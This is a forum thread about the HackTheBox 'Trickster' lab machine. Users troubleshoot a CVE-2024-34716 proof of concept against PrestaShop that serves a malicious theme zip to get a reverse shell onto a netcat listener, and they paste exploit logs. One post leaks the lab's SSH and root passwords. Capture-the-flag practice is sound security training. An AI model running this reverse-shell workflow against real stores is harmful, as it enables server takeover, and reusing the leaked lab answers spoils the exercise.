|
Hackthbox Trickster Linux - Medium
by selukas - Wednesday September 18, 2024 at 06:22 PM
|
|
Sep 22, 2024, 12:28 PM
after several hours of tapping
i did it like this: remove the part with the tread when your web server receives the request do this curl http://shop.trickster.htb/themes/next/a.php that solves the problem (Sep 22, 2024, 12:28 PM)chapchap Wrote: after several hours of tapping The zip file is not being unzipped for me on the web server apparently, the theme is not there as i can't access a.php Can anyone check the files with me in DMs (I'm sure that I'm doing everything as it should) ?
make sure when rezipping, all files are there like in the poc zip; especially make sure the .htaccess file is in it, cause normal zip command does not zip hidden files; best is just modify the a.php in the zip without extracting
Sep 22, 2024, 02:34 PM
Is it normal for the bot to take ages to click on the attachement ? I swear for me it works once every ten tries while I have all the files correctly set up.
Sep 22, 2024, 05:54 PM
I stuck at 403 after exploit!!!!!
Sep 22, 2024, 07:14 PM
(Sep 22, 2024, 12:28 PM)chapchap Wrote: after several hours of tapping I KEEP GETING Forbidden [X] Yay! Your exploit was sent successfully! [X] Once a CS agent clicks on attachement, you'll get a SHELL [X] Start NetCat on Port 1234 [!] Reverse Shell Failed. Status code: 403 Reason: Forbidden [!] Reverse Shell Failed. Status code: 403 Reason: Forbidden [!] Reverse Shell Failed. Status code: 403 Reason: Forbidden [!] Reverse Shell Failed. Status code: 403 Reason: Forbidden └─$ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.129.18.204 - - [22/Sep/2024 18:32:57] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 - 10.129.18.204 - - [22/Sep/2024 19:00:25] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 - 10.129.18.204 - - [22/Sep/2024 19:05:47] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 - This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Sep 22, 2024, 08:44 PM
USER FLAG
# ssh james@10.10.11.34 password: alwaysandforever ROOT FLAG #su root password: #YouC4ntCatchMe# This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying to someone else's scam report | Failure to follow the first fucking rule of the scam reports section
Sep 22, 2024, 09:00 PM
Im having this problem for hours:
ckster.htb/CVE-2024-34716_PoC/exploit.html [X] Yay! Your exploit was sent successfully! [X] Once a CS agent clicks on attachement, you'll get a SHELL Ncat: Version 7.94SVN ( https://nmap.org/ncat ) Ncat: Listening on [::]:1234 Ncat: Listening on 0.0.0.0:1234 ls python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.129.21.246 - - [22/Sep/2024 16:21:15] "GET /check-this-out.zip HTTP/1.1" 200 - any of you found some alternative way?
Sep 22, 2024, 09:07 PM
(Sep 22, 2024, 07:14 PM)local Wrote:(Sep 22, 2024, 12:28 PM)chapchap Wrote: after several hours of tapping Do not unzip / rezip , just double click on the zip file and modify the reverse shell this way the POC will proceed and unzip the theme . i was also stuck there until i did this
Sep 22, 2024, 09:10 PM
is james > root even the intended path?
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 370 | 92,221 |
1 hour ago Last Post: lifolifo007 |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,195 |
4 hours ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,499 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
[FREE] HackTheBox All Cheatsheets | 3 | 400 |
Yesterday, 10:36 PM Last Post: op334 |
|
| CBBH Write Ups | 22 | 6,232 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||
